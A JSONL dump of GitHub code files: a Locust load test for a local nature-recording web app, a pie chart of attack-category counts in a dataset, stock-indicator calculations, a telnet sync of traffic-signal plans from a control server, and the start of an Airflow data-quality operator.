+{"seq_id":"25214250572","text":"import os\nimport time\nimport datetime\nfrom bs4 import BeautifulSoup\nfrom random import randrange\nfrom locust import HttpUser, task, between, events\nfrom locust_tests.flask_app_runner import FlaskAppRunner\nfrom naturerec_model.model import create_database, get_data_path, Sighting\nfrom naturerec_model.logic import list_locations, list_categories, list_species, create_user\nfrom naturerec_model.data_exchange import SightingsImportHelper, StatusImportHelper\nfrom naturerec_web import create_app\n\nTEST_USER_NAME = \"locust\"\nTEST_PASSWORD = \"password\"\n\n\nflask_runner = FlaskAppRunner(\"127.0.0.1\", 5000, create_app())\n\n\n@events.test_start.add_listener\ndef on_test_start(environment, **kwargs):\n \"\"\"\n Before any tests run, start the Flask application\n\n :param environment: Ignored\n :param kwargs: Ignored\n \"\"\"\n # Reset the database\n create_database()\n\n # Create a login\n create_user(TEST_USER_NAME, TEST_PASSWORD)\n\n # Import some sample sightings\n sightings_file = os.path.join(get_data_path(), \"imports\", \"locust_sightings.csv\")\n with open(sightings_file, mode=\"rt\", encoding=\"utf-8\") as f:\n importer = SightingsImportHelper(f)\n importer.start()\n importer.join()\n\n # Import a sample conservation status scheme\n scheme_file = os.path.join(get_data_path(), \"imports\", \"locust_bocc5.csv\")\n with open(scheme_file, mode=\"rt\", encoding=\"utf-8\") as f:\n importer = StatusImportHelper(f)\n importer.start()\n importer.join()\n\n # Start the site\n global flask_runner\n flask_runner.start()\n\n\n@events.test_stop.add_listener\ndef on_test_stop(environment, **kwargs):\n \"\"\"\n When the tests complete, stop the Flask application\n\n :param environment: Ignored\n :param kwargs: Ignored\n \"\"\"\n global flask_runner\n flask_runner.stop_server()\n flask_runner.join()\n\n\nclass NatureRecorderUser(HttpUser):\n \"\"\"\n Locust load test, targeting the Nature Recorder application hosted locally in the flask development server. 
The\n tests are weighted as follows:\n\n +----------------------------------+----+\n | Test | % |\n +----------------------------------+----+\n | go_to_home_page | 1 |\n +----------------------------------+----+\n | list_locations | 1 |\n +----------------------------------+----+\n | add_location | 1 |\n +----------------------------------+----+\n | list_categories | 1 |\n +----------------------------------+----+\n | add_category | 1 |\n +----------------------------------+----+\n | list_species | 1 |\n +----------------------------------+----+\n | add_species | 1 |\n +----------------------------------+----+\n | list_sightings | 20 |\n +----------------------------------+----+\n | add_sighting | 70 |\n +----------------------------------+----+\n | list_conservation_status_schemes | 1 |\n +----------------------------------+----+\n | show_life_list | 1 |\n +----------------------------------+----+\n | list_recent_background_jobs | 1 |\n +----------------------------------+----+\n \"\"\"\n\n #: Simulated users will wait between 1 and 5 seconds per task\n wait_time = between(1, 5)\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self._locations = None\n self._categories = None\n\n def on_start(self):\n \"\"\"\n Establish some facts about the data so the tests can simulate realistic actions\n \"\"\"\n self._locations = list_locations()\n self._categories = list_categories()\n self._login()\n\n @task\n def go_to_home_page(self):\n \"\"\"\n Task to open the home page of the application\n \"\"\"\n self.client.get(\"/\")\n\n @task\n def list_locations(self):\n \"\"\"\n Task to simulate listing the locations\n \"\"\"\n self.client.get(\"/locations/list\")\n\n @task\n def add_location(self):\n \"\"\"\n Task to simulate adding a location\n \"\"\"\n csrf_token = self._get_csrf_token_for_form(\"/locations/edit\")\n name = self._get_name(\"Location\")\n county = self._get_name(\"County\")\n country = self._get_name(\"Country\")\n self.client.post(\"/locations/edit\", data={\n \"name\": name,\n \"address\": \"\",\n \"city\": \"\",\n \"county\": county,\n \"postcode\": \"\",\n \"country\": country,\n \"latitude\": \"\",\n \"longitude\": \"\",\n \"csrf_token\": csrf_token\n })\n\n @task\n def list_categories(self):\n \"\"\"\n Task to simulate listing the categories\n \"\"\"\n self.client.get(\"/categories/list\")\n\n @task\n def add_category(self):\n \"\"\"\n Task to simulate adding a category\n \"\"\"\n csrf_token = self._get_csrf_token_for_form(\"/categories/edit\")\n name = self._get_name(\"Category\")\n self.client.post(\"/categories/edit\", data={\n \"name\": name,\n \"csrf_token\": csrf_token\n })\n\n @task\n def list_species(self):\n \"\"\"\n Task to simulate listing the species belonging to a selected category\n \"\"\"\n csrf_token = self._get_csrf_token_for_form(\"/species/list\")\n category_id = self._get_random_category_id()\n self.client.post(\"/species/list\", data={\n \"category\": str(category_id),\n \"csrf_token\": csrf_token\n })\n\n @task\n def add_species(self):\n \"\"\"\n Task to simulate adding a species\n \"\"\"\n csrf_token = self._get_csrf_token_for_form(\"/species/add\")\n category_id = self._get_random_category_id()\n name = self._get_name(\"Species\")\n self.client.post(\"/species/add\", data={\n \"category\": str(category_id),\n \"name\": name,\n \"csrf_token\": csrf_token\n })\n\n @task(20)\n def list_sightings(self):\n \"\"\"\n Task to simulate listing the sightings\n \"\"\"\n self.client.get(\"/sightings/list\")\n\n @task(70)\n def 
add_sighting(self):\n \"\"\"\n Task to simulate adding a new sighting\n \"\"\"\n csrf_token = self._get_csrf_token_for_form(\"/sightings/edit\")\n sighting_date = datetime.datetime.today().strftime(Sighting.DATE_DISPLAY_FORMAT)\n location_id = self._get_random_location_id()\n category_id = self._get_random_category_id()\n species_id = self._get_random_species_id(category_id)\n self.client.post(\"/sightings/edit\", data={\n \"date\": sighting_date,\n \"location\": str(location_id),\n \"category\": str(category_id),\n \"species\": str(species_id),\n \"number\": \"1\",\n \"gender\": \"0\",\n \"with_young\": \"0\",\n \"notes\": \"\",\n \"csrf_token\": csrf_token\n })\n\n @task\n def list_conservation_status_schemes(self):\n \"\"\"\n Task to simulate listing the conservation status schemes\n \"\"\"\n self.client.get(\"/status/list\")\n\n @task\n def show_life_list(self):\n \"\"\"\n Task to simulate showing the life list for a category\n \"\"\"\n csrf_token = self._get_csrf_token_for_form(\"/life_list/list\")\n category_id = self._get_random_category_id()\n self.client.post(\"/life_list/list\", data={\n \"category\": str(category_id),\n \"csrf_token\": csrf_token\n })\n\n @task\n def list_recent_background_jobs(self):\n \"\"\"\n Task to simulate listing the recent background jobs\n \"\"\"\n self.client.get(\"/jobs/list\")\n\n def _login(self):\n \"\"\"\n Log in using the test account\n \"\"\"\n csrf_token = self._get_csrf_token_for_form(\"/auth/login\")\n self.client.post(\"/auth/login\", data={\n \"username\": TEST_USER_NAME,\n \"password\": TEST_PASSWORD,\n \"csrf_token\": csrf_token\n })\n\n def _get_csrf_token_for_form(self, url):\n \"\"\"\n Request a page containing a form and return the CSRF token from it\n\n :param url: URL for the page containing the form\n :return: CSFR token\n \"\"\"\n response = self.client.get(url)\n form_data = BeautifulSoup(response.text, \"html.parser\")\n csrf_token_field = form_data.find(attrs={\"name\": \"csrf_token\"})\n return csrf_token_field[\"value\"]\n\n def _get_random_location_id(self):\n \"\"\"\n Return a random location ID for an existing location\n \"\"\"\n index = randrange(0, len(self._locations))\n return self._locations[index].id\n\n def _get_random_category_id(self):\n \"\"\"\n Return a random category ID for an existing category\n \"\"\"\n index = randrange(0, len(self._categories))\n return self._categories[index].id\n\n @staticmethod\n def _get_random_species_id(category_id):\n \"\"\"\n Return a random species ID for species in the specified category\n\n :param category_id: Category ID from which to select a species\n \"\"\"\n species = list_species(category_id)\n index = randrange(0, len(species))\n return species[index].id\n\n def _get_name(self, prefix):\n \"\"\"\n Construct a unique name for a new record with the specified prefix\n\n :param prefix: Prefix indicating the record type\n :return: Unique record name\n \"\"\"\n return f\"{prefix} - {id(self)} - {int(time.time())}\"\n","repo_name":"davewalker5/NatureRecorderPy","sub_path":"tests/locust_tests/locustfile.py","file_name":"locustfile.py","file_ext":"py","file_size_in_byte":9628,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"14828981111","text":"import matplotlib.pyplot as plt\n\nDDOS = 1926624\nDOS = 1650260\nRECON = 91082\nNORMAL = 477\nTHEFT = 79\nTOTAL = DDOS + DOS + RECON + NORMAL + THEFT\n\n# Pie chart, where the slices will be ordered and plotted counter-clockwise:\nlabels = [ 'DoS', 'Reconnaissance', 'Normal', 
'DDoS','Theft']\nsizes = [ DOS/TOTAL, RECON/TOTAL, NORMAL/TOTAL, DDOS/TOTAL,THEFT/TOTAL]\nexplode = (0, 0.0, 0, 0.1, 0.2)\n\nfig1, ax1 = plt.subplots()\nax1.pie(sizes, explode=explode, labels=labels, autopct='%1.1f%%',\n shadow=True, startangle=90)\nax1.axis('equal') # Equal aspect ratio ensures that pie is drawn as a circle.\n\nplt.show()\n\n\n","repo_name":"kaylani2/machineLearning","sub_path":"src/plot_functions/mockups_and_tests/pie.py","file_name":"pie.py","file_ext":"py","file_size_in_byte":611,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"43"} +{"seq_id":"71405348610","text":"import pandas as pd\nimport numpy as np\n\n#data=pd.read_csv(\"data/RELIANCE.csv\")\n\nindicators_csv=pd.DataFrame(columns=['exchange','scrip','scrip_name','all_time_high','all_time_low','Fib 23.6','Fib 38.2'\n ,'Fib 61.8','Fib 78.6'])\ndim_scrips=pd.read_csv('dim_scrips.csv')\nichmoku_cloud=pd.DataFrame(columns=['exchange','scrip','scrip_name','open','high','low','close','volume','conversion_line','base_line','lead_span_A','lead_span_B','lagging_span'])\ni=0\ntotal_scrips=len(dim_scrips)\ntry:\n for i,row in dim_scrips.iterrows():\n scrip=row['Symbol']\n scrip_name=row['Company Name']\n #print(f\"Analysing scrip {scrip}\")\n data=pd.read_parquet(f\"data/{scrip}.parquet\")\n #data.index=pd.to_datetime(data['date'])\n date_index_without_tz=data.index.tz_convert(None)\n data.index=pd.to_datetime(date_index_without_tz)\n data['scrip']=scrip\n data['scrip_name']=scrip_name\n data['exchange']=\"NSE\" \n scrip_max=data['high'].max()\n scrip_min=data['low'].min() # all-time low must come from the 'low' column, not 'high'\n diff=scrip_max-scrip_min\n fb_23_6=scrip_max-(diff*0.236)\n fb_38_2=scrip_max-(diff*0.382)\n fb_61_8=scrip_max-(diff*0.618)\n fb_78_6=scrip_max-(diff*0.786)\n \n # Define length of Tenkan Sen or Conversion Line\n cl_period = 20 \n \n # Define length of Kijun Sen or Base Line\n bl_period = 60 \n \n # Define length of Senkou Sen B or Leading Span B\n lead_span_b_period = 120 \n \n # Define length of Chikou Span or Lagging Span\n lag_span_period = 30 \n \n # Calculate conversion line\n high_20 = data['high'].rolling(cl_period).max()\n low_20 = data['low'].rolling(cl_period).min()\n data['conversion_line'] = (high_20 + low_20) / 2\n \n # Calculate base line\n high_60 = data['high'].rolling(bl_period).max()\n low_60 = data['low'].rolling(bl_period).min()\n data['base_line'] = (high_60 + low_60) / 2\n \n # Calculate leading span A\n data['lead_span_A'] = ((data.conversion_line + data.base_line) / 2).shift(lag_span_period)\n \n # Calculate leading span B\n high_120 = data['high'].rolling(120).max()\n low_120 = data['low'].rolling(120).min() # span B low must use the 'low' column, not 'high'\n data['lead_span_B'] = ((high_120 + low_120) / 2).shift(lead_span_b_period)\n \n # Calculate lagging span\n data['lagging_span'] = data['close'].shift(-lag_span_period)\n\n indicators_csv.loc[i]=\"NSE\",scrip,scrip_name,scrip_max,scrip_min,fb_23_6,fb_38_2,fb_61_8,fb_78_6\n #data.to_csv(\"ichmoku_cloud.csv\")\n ichmoku_cloud=pd.concat([ichmoku_cloud,data])\n print(f\"Analysis Completed {round((i+1)/total_scrips*100,2)} % \",end=\"\\\r\")\n i=i+1\n \nexcept Exception as e:\n print(e)\n\nindicators_csv.to_excel(\"indicators.xlsx\",index=False)\nprint(\"\\nGenerated fibonacci\")\nichmoku_cloud.to_csv(\"ichmoku_cloud.csv\")\nprint(\"Generated 
ichmoku\")","repo_name":"webclinic017/turing_trade","sub_path":"generate_indicators.py","file_name":"generate_indicators.py","file_ext":"py","file_size_in_byte":2793,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"16300281904","text":"import re\r\nimport pyte\r\nimport copy\r\nimport datetime\r\nimport pandas as pd\r\nimport dacot_models as dm\r\nfrom .config import get_settings\r\nfrom .telnet_command_executor import TelnetCommandExecutor as TCE\r\nfrom .graphql_mutations import DEFAULT_VEHICLE_INTERGREEN_VALUE\r\nfrom .complex_operations import ComputeJunctionPlansTables\r\n\r\nclass SyncProjectFromControlException(Exception):\r\n pass\r\n\r\nclass SyncProject:\r\n def __init__(self, project):\r\n self.__proj = project\r\n self.__exec = TCE(host=get_settings().utc_host, port=get_settings().utc_port)\r\n self.__read_remote_sleep = 3\r\n self.__read_remote_login_sleep = 12\r\n self.__re_ansi_escape = re.compile(r'\\x1B(?:[@-Z\\\\-_]|[0-9]|\\[[0-?]*[ -/]*[@-~])|\\r|\\n')\r\n self.__re_program = re.compile(r'(?P(\\d{2}:\\d{2}:\\d{2})?)(\\d{3})?\\s+PLAN\\s+(?P[J|A]\\d{6})\\s+(?P(\\d+|[A-Z]{1,2}))\\s+TIMETABLE$')\r\n self.__re_scoot = re.compile(r'^(\\d+)\\s*(XSCO|SCOO).*$')\r\n self.__re_demand = re.compile(r'^(\\d+)\\s*(XDEM|DEMA).*$')\r\n self.__re_program_hour = re.compile(r'(?P\\d{2}:\\d{2}:\\d{2}).*$')\r\n self.__re_plan = re.compile(r'^Plan\\s+(?P\\d+)\\s(?PJ\\d{6}).*(?PCY\\d{3})\\s(?P[A-Z0-9\\s,!*]+)$')\r\n self.__re_intergreens_table = re.compile(r'\\s(?P[A-Z])\\s+(?P[NY])\\s+(?P\\d+)\\s+(?P\\d+)\\s+(?P((X|\\d+)\\s+)+(X|\\d+))')\r\n self.__re_extract_phases = re.compile(r'\\s[A-Z]\\s\\d+')\r\n self.__re_extract_sequence = re.compile(r'Cyclic Check Sequence\\s+:\\s\\[(?P[A-Z]+)')\r\n self.__re_ctrl_type = re.compile(r'Controller Type\\s+:\\s\\[(?P.*)]')\r\n self.__table_id_to_day = {\r\n '1': 'LU',\r\n '2': 'SA',\r\n '3': 'DO'\r\n }\r\n\r\n def __step1(self):\r\n out1 = copy.deepcopy(self.__session1())\r\n assert list(out1[0].keys()) == list(out1[1].keys())\r\n progs = self.__build_programs(out1[0])\r\n plans = self.__build_plans(out1[0])\r\n return plans, progs\r\n\r\n def __step2(self):\r\n out2 = copy.deepcopy(self.__session2())\r\n assert list(out2[0].keys()) == list(out2[1].keys())\r\n return self.__build_sequence(out2[1])\r\n\r\n def __step3(self):\r\n out3 = copy.deepcopy(self.__session3())\r\n assert list(out3[0].keys()) == list(out3[1].keys())\r\n return self.__build_inters(out3[1])\r\n\r\n def run(self):\r\n inters = self.__step3()\r\n seq = self.__step2()\r\n plans, progs = self.__step1()\r\n self.__update_project(plans, progs, inters, seq)\r\n return self.__proj\r\n\r\n def __build_sequence(self, data):\r\n r = {}\r\n screen = pyte.Screen(80, 25)\r\n stream = pyte.Stream(screen)\r\n for junc in self.__proj.otu.junctions:\r\n k = 'get-seed-{}'.format(junc.jid)\r\n for line in self.__posibles_lists_to_list(data[k]):\r\n stream.feed(line)\r\n result_screen = '\\n'.join(screen.display)\r\n seq_info = self.__extract_sequence(junc, result_screen)\r\n known_types = {}\r\n seq_objs = []\r\n for s in junc.sequence:\r\n known_types[s.phid_system] = s.type\r\n for sid in seq_info['seq']:\r\n t = 'No Configurada'\r\n if sid in known_types:\r\n t = known_types[sid]\r\n seq_objs.append(dm.JunctionPhaseSequenceItem(phid_system=sid, phid=str(ord(sid) - 64), type=t))\r\n r[junc.jid] = {\r\n 'seq': seq_objs,\r\n 'ctype': seq_info['ctype']\r\n }\r\n return r\r\n\r\n def __extract_sequence(self, junc, screen):\r\n r = {}\r\n 
print('DEBUG __extract_sequence')\r\n print('=' * 35)\r\n print(screen)\r\n print('=' * 35)\r\n sequence_match = list(self.__re_extract_sequence.finditer(screen)) # re flags such as re.MULTILINE must be set in re.compile(); passed here they are silently taken as the 'pos' argument\r\n if len(sequence_match) != 1:\r\n raise ValueError('__extract_sequence: Failed to find Sequence for {}'.format(junc.jid))\r\n seqstr = sequence_match[0].group('sequence').strip()\r\n seq = []\r\n for pid in seqstr:\r\n seq.append(pid)\r\n r['seq'] = seq\r\n ctrl_match = list(self.__re_ctrl_type.finditer(screen))\r\n if len(ctrl_match) != 1:\r\n raise ValueError('__extract_sequence: Failed to find ControllerType for {}'.format(junc.jid))\r\n r['ctype'] = ctrl_match[0].group('ctrl_type').strip()\r\n return r\r\n\r\n def __build_inters(self, data):\r\n r = {}\r\n screen = pyte.Screen(80, 25)\r\n stream = pyte.Stream(screen)\r\n for junc in self.__proj.otu.junctions:\r\n k = 'get-seed-timings-{}'.format(junc.jid)\r\n for line in self.__posibles_lists_to_list(data[k]):\r\n stream.feed(line)\r\n result_screen = '\\n'.join(screen.display)\r\n inters = self.__extract_intergreens(junc, result_screen)\r\n r[junc.jid] = inters\r\n return r\r\n\r\n def __extract_intergreens(self, junc, screen):\r\n print('DEBUG __extract_intergreens')\r\n print('=' * 35)\r\n print(screen)\r\n print('=' * 35)\r\n rows_match = list(self.__re_intergreens_table.finditer(screen))\r\n if len(rows_match) == 0:\r\n raise ValueError('__extract_intergreens: Failed to extract intergreens for {}'.format(junc.jid))\r\n table = []\r\n names = []\r\n for row in rows_match:\r\n inter_values = row.group('intergreens')\r\n names.append(row.group('phase_name'))\r\n trow = [row.group('phase_name'), row.group('is_demand'), row.group('min_time'), row.group('max_time')]\r\n trow.extend(inter_values.split())\r\n table.append(trow)\r\n column_names = ['Phase', 'IsDemand', 'MinTime', 'MaxTime']\r\n column_names.extend(names)\r\n for row in table:\r\n if len(row) != len(column_names):\r\n raise ValueError('__extract_intergreens: Invalid row length: row={} columns={}'.format(row, len(column_names)))\r\n df = pd.DataFrame(table, columns=column_names)\r\n df = df.set_index('Phase')\r\n cols = df.columns[3:]\r\n inters = []\r\n for i in cols:\r\n for j in cols:\r\n if i != j and 'X' not in df[i][j]:\r\n newi = dm.JunctionIntergreenValue(phfrom=j, phto=i, value=df[i][j])\r\n newi.validate()\r\n inters.append(newi)\r\n return inters\r\n\r\n def __update_project(self, plans, progs, inters, seq):\r\n new_progs = []\r\n for p in progs:\r\n i = dm.OTUProgramItem(day=p[0], time=p[1], plan=p[2])\r\n i.validate()\r\n new_progs.append(i)\r\n self.__proj.otu.programs = new_progs\r\n for junc in self.__proj.otu.junctions:\r\n junc.intergreens = inters[junc.jid]\r\n junc.sequence = seq[junc.jid]['seq']\r\n if junc.metadata.use_default_vi4:\r\n junc.plans = self.__generate_plans_objs(plans[junc.jid])\r\n veh_inters = []\r\n for inter in junc.intergreens:\r\n new_inter = dm.JunctionIntergreenValue()\r\n new_inter.phfrom = inter.phfrom\r\n new_inter.phto = inter.phto\r\n new_inter.value = str(DEFAULT_VEHICLE_INTERGREEN_VALUE)\r\n veh_inters.append(new_inter)\r\n junc.veh_intergreens = veh_inters\r\n else:\r\n junc.plans = self.__generate_plans_objs(plans[junc.jid])\r\n veh_inters = []\r\n inters_map = {}\r\n for inter in junc.veh_intergreens:\r\n if inter.phfrom not in inters_map:\r\n inters_map[inter.phfrom] = {}\r\n inters_map[inter.phfrom][inter.phto] = str(inter.value)\r\n for inter in junc.intergreens:\r\n new_inter = dm.JunctionIntergreenValue()\r\n 
new_inter.phfrom = inter.phfrom\r\n new_inter.phto = inter.phto\r\n val = inters_map.get(inter.phfrom, {}).get(inter.phto)\r\n if not val:\r\n raise ValueError('Missing VI for pair ({}, {})'.format(inter.phfrom, inter.phto))\r\n new_inter.value = val\r\n veh_inters.append(new_inter)\r\n junc.veh_intergreens = veh_inters\r\n compute = ComputeJunctionPlansTables(self.__proj)\r\n self.__proj.metadata.last_sync_date = datetime.datetime.utcnow()\r\n self.__proj.metadata.status_date = self.__proj.metadata.last_sync_date\r\n self.__proj = compute.run()\r\n\r\n def __generate_plans_objs(self, plans):\r\n res = []\r\n for p in plans:\r\n start = []\r\n for s in p[2]:\r\n val = dm.JunctionPlanPhaseValue(phid=s[0], value=s[1])\r\n val.validate()\r\n start.append(val)\r\n newp = dm.JunctionPlan(plid=p[0], cycle=p[1], system_start=start)\r\n newp.validate()\r\n res.append(newp)\r\n return res\r\n\r\n def __build_plans(self, out):\r\n res = {}\r\n for junc in self.__proj.otu.junctions:\r\n k = 'get-plans-{}'.format(junc.jid)\r\n res[junc.jid] = []\r\n for line in out[k]:\r\n match = self.__re_plan.match(line)\r\n if match:\r\n plan_id = match.group('id')\r\n cycle = match.group('cycle')\r\n cycle_int = int(cycle.split('CY')[1])\r\n phases = []\r\n for x in self.__re_extract_phases.findall(' {}'.format(match.group('phases'))):\r\n name, start = x.strip().split()\r\n phases.append((str(ord(name) - 64), str(int(start))))\r\n res[junc.jid].append((plan_id, cycle_int, phases))\r\n return res\r\n\r\n def __build_programs(self, out):\r\n kl = [k for k in out if 'get-programs-' in k]\r\n res = {}\r\n for k in kl:\r\n tid = k[-1]\r\n current_time = ''\r\n for line in out[k]:\r\n new_hour = self.__check_new_hour(line)\r\n prog_match = self.__re_program.match(line)\r\n is_extra_day = self.__check_is_day(line)\r\n is_scoot_change = self.__check_is_scoot(line)\r\n is_demand_change = self.__check_is_demand(line)\r\n if new_hour[0]:\r\n current_time = new_hour[1]\r\n if prog_match:\r\n res[(self.__table_id_to_day[tid], current_time, prog_match.group('plan'))] = prog_match.group('plan')\r\n elif is_extra_day[0]:\r\n line_without_day = is_extra_day[1]\r\n line_day = is_extra_day[2]\r\n extra_plan_match = self.__re_program.match(line_without_day)\r\n extra_scoot_match = self.__check_is_scoot(line_without_day)\r\n extra_demand_match = self.__check_is_demand(line_without_day)\r\n if extra_plan_match:\r\n res[(line_day, current_time, extra_plan_match.group('plan'))] = extra_plan_match.group('plan')\r\n elif extra_scoot_match[0]:\r\n res[(line_day, current_time, extra_scoot_match[1])] = extra_scoot_match[1]\r\n elif extra_demand_match[0]:\r\n res[(line_day, current_time, extra_demand_match[1])] = extra_demand_match[1]\r\n elif is_scoot_change[0]:\r\n res[(self.__table_id_to_day[tid], current_time, is_scoot_change[1])] = is_scoot_change[1]\r\n elif is_demand_change[0]:\r\n res[(self.__table_id_to_day[tid], current_time, is_demand_change[1])] = is_demand_change[1]\r\n else:\r\n pass\r\n final_progs = []\r\n for k, v in res.items():\r\n item = (k[0], k[1], v)\r\n new_item = (k[0], k[1], k[2], v)\r\n print('Item: {} -> NewItem: {}'.format(item, new_item))\r\n final_progs.append(item)\r\n sorted = self.__sort_programs(final_progs)\r\n print('Result of __sort_programs: {}'.format(sorted))\r\n final_result = self.__map_by_time_and_clear(sorted)\r\n print('Final result of __map_by_time_and_clear: {}'.format(final_result))\r\n return final_result\r\n\r\n def __map_by_time_and_clear(self, sorted):\r\n m = {}\r\n r = []\r\n for i in 
sorted:\r\n k = (i[0], i[1])\r\n if k not in m:\r\n m[k] = []\r\n m[k].append(i[2])\r\n for k, v in m.items():\r\n if len(v) > 1:\r\n if 'XSCO' in v or 'SCOO' in v or 'XDEM' in v or 'DEMA' in v:\r\n for x in v:\r\n r.append((k[0], k[1], x))\r\n else:\r\n r.append((k[0], k[1], v[-1])) \r\n else:\r\n r.append((k[0], k[1], v[0]))\r\n return r\r\n\r\n def __sort_programs(self, progs):\r\n dmap = {\r\n 'LU': 0,\r\n 'MA': 1,\r\n 'MI': 2,\r\n 'JU': 3,\r\n 'VI': 4,\r\n 'SA': 5,\r\n 'DO': 6\r\n }\r\n rdmap = {\r\n 0: 'LU',\r\n 1: 'MA',\r\n 2: 'MI',\r\n 3: 'JU',\r\n 4: 'VI',\r\n 5: 'SA',\r\n 6: 'DO'\r\n }\r\n to_sort = []\r\n for p in progs:\r\n a = dmap[p[0]]\r\n b = self.__time_to_mins(p[1])\r\n to_sort.append((a, b, p[1], p[2]))\r\n sorted_plans = sorted(to_sort, key=lambda x: (x[0], x[1]))\r\n res = []\r\n for i in sorted_plans:\r\n res.append((rdmap[i[0]], i[2], i[3]))\r\n return res\r\n\r\n def __time_to_mins(self, timestr):\r\n h, m = timestr.split(':')\r\n return int(h) * 60 + int(m)\r\n\r\n def __check_new_hour(self, line):\r\n match = self.__re_program_hour.match(line)\r\n if match:\r\n return (True, match.group('hour')[:-3])\r\n return (False, None)\r\n\r\n def __check_is_demand(self, line):\r\n if self.__re_demand.match(line):\r\n if 'XDEM' in line:\r\n return (True, 'XDEM')\r\n elif 'DEMA' in line:\r\n return (True, 'DEMA')\r\n else:\r\n return (False, None)\r\n else:\r\n return (False, None)\r\n\r\n def __check_is_scoot(self, line):\r\n if self.__re_scoot.match(line):\r\n if 'XSCO' in line:\r\n return (True, 'XSCO')\r\n elif 'SCOO' in line:\r\n return (True, 'SCOO')\r\n else:\r\n return (False, None)\r\n else:\r\n return (False, None)\r\n\r\n def __check_is_day(self, line):\r\n to_spanish = {\r\n 'MONDAY ': 'LU',\r\n 'TUESDAY ': 'MA',\r\n 'WEDNESDAY ': 'MI',\r\n 'THURSDAY ': 'JU',\r\n 'FRIDAY ': 'VI',\r\n 'SATURDAY ': 'SA',\r\n 'SUNDAY ': 'DO'\r\n }\r\n days = ['MONDAY ', 'TUESDAY ', 'WEDNESDAY ', 'THURSDAY ', 'FRIDAY ', 'SATURDAY ', 'SUNDAY ']\r\n for d in days:\r\n if d in line:\r\n return (True, line.replace(d, ''), to_spanish[d])\r\n return (False, None, None)\r\n\r\n def __session1(self):\r\n self.__exec.reset()\r\n self.__control_login()\r\n for junc in self.__proj.otu.junctions:\r\n self.__list_plans(junc.jid)\r\n self.__get_programs(junc.jid)\r\n self.__logout()\r\n print('Using plan for {} (__session1): {}'.format(self.__proj.oid, self.__exec.history()))\r\n self.__exec.run(debug=True)\r\n out = self.__exec.get_results()\r\n self.__run_login_check(out)\r\n return (self.__output_to_text_block(out), out)\r\n\r\n def __session2(self):\r\n self.__exec.reset()\r\n self.__control_login()\r\n for junc in self.__proj.otu.junctions:\r\n self.__get_sequence(junc.jid)\r\n self.__logout()\r\n print('Using plan for {} (__session2): {}'.format(self.__proj.oid, self.__exec.history()))\r\n self.__exec.run(debug=True)\r\n out = self.__exec.get_results()\r\n self.__run_login_check(out)\r\n return (self.__output_to_text_block(out), out)\r\n\r\n def __session3(self):\r\n self.__exec.reset()\r\n self.__control_login()\r\n for junc in self.__proj.otu.junctions:\r\n self.__get_inters(junc.jid)\r\n self.__logout()\r\n print('Using plan for {} (__session3): {}'.format(self.__proj.oid, self.__exec.history()))\r\n self.__exec.run(debug=True)\r\n out = self.__exec.get_results()\r\n self.__run_login_check(out)\r\n return (self.__output_to_text_block(out), out)\r\n\r\n def __list_plans(self, jid):\r\n self.__exec.command('get-plans-{}'.format(jid), 'LIPT {} TIMINGS'.format(jid))\r\n 
self.__exec.sleep(self.__read_remote_sleep)\r\n self.__exec.read_lines(encoding='iso-8859-1', line_ending=b'\\x1b8\\x1b7')\r\n\r\n def __get_programs(self, jid):\r\n for day_table_code in range(1, 4):\r\n self.__exec.command('get-programs-{}-{}'.format(jid, day_table_code), 'OUTT {} {} EXPAND'.format(jid, day_table_code))\r\n self.__exec.sleep(self.__read_remote_sleep)\r\n self.__exec.read_lines(encoding='iso-8859-1', line_ending=b'\\x1b8\\x1b7')\r\n\r\n def __get_sequence(self, jid):\r\n self.__exec.command('get-seed-{}'.format(jid), 'SEED {}'.format(jid))\r\n self.__exec.sleep(self.__read_remote_sleep)\r\n self.__exec.read_until_min_bytes(2000, encoding=\"iso-8859-1\", line_ending=b\"\\x1b8\\x1b7\")\r\n self.__exec.exit_interactive_command()\r\n\r\n def __get_inters(self, jid):\r\n self.__exec.command('get-seed-timings-{}'.format(jid), 'SEED {} UPPER_TIMINGS'.format(jid))\r\n self.__exec.sleep(self.__read_remote_sleep)\r\n self.__exec.read_until_min_bytes(2000, encoding=\"iso-8859-1\", line_ending=b\"\\x1b8\\x1b7\")\r\n self.__exec.exit_interactive_command()\r\n\r\n def __run_login_check(self, out):\r\n if 'Access Denied' in self.__lines_to_string(out['login-pass']):\r\n raise SyncProjectFromControlException('Invalid Credentials for Control Server')\r\n if 'Successfully logged in!' not in self.__lines_to_string(out['login-pass']):\r\n raise SyncProjectFromControlException('Unknown error in login for Control Server')\r\n\r\n def __logout(self):\r\n self.__exec.command('end-session', 'ENDS')\r\n\r\n def __lines_to_string(self, l):\r\n return ''.join(self.__flatten(l))\r\n\r\n def __flatten(self, l):\r\n return [i for s in l for i in s]\r\n\r\n def __control_login(self):\r\n self.__exec.read_until('Username:', self.__read_remote_login_sleep)\r\n self.__exec.command('login-user', get_settings().utc_user)\r\n self.__exec.read_until('Password:', self.__read_remote_login_sleep)\r\n self.__exec.command('login-pass', get_settings().utc_passwd)\r\n self.__exec.read_lines(encoding='iso-8859-1')\r\n\r\n def __output_to_text_block(self, data):\r\n r = {}\r\n for k, v in data.items():\r\n t = []\r\n for i in self.__posibles_lists_to_list(v):\r\n clean_line = self.__re_ansi_escape.sub('', i).strip()\r\n t.append(clean_line)\r\n r[k] = t\r\n return r\r\n\r\n def __posibles_lists_to_list(self, v):\r\n t = []\r\n for possible_list in v:\r\n if type(possible_list) == list:\r\n for line in possible_list:\r\n t.append(line)\r\n else:\r\n t.append(possible_list)\r\n return t\r\n","repo_name":"DACoT-UOCT/backend","sub_path":"fastapi_backend/app/control_operations.py","file_name":"control_operations.py","file_ext":"py","file_size_in_byte":19768,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"507722385","text":"from airflow.hooks.postgres_hook import PostgresHook\nfrom airflow.models import BaseOperator\nfrom airflow.utils.decorators import apply_defaults\n\nclass DataQualityOperator(BaseOperator):\n\n ui_color = '#89DA59'\n\n @apply_defaults\n def __init__(self,\n redshift_conn_id=\"\",\n sql_stmt=\"\",\n result=\"\",\n *args, **kwargs):\n\n super(DataQualityOperator, self).__init__(*args, **kwargs)\n self.redshift_conn_id = redshift_conn_id\n self.sql_stmt = sql_stmt\n 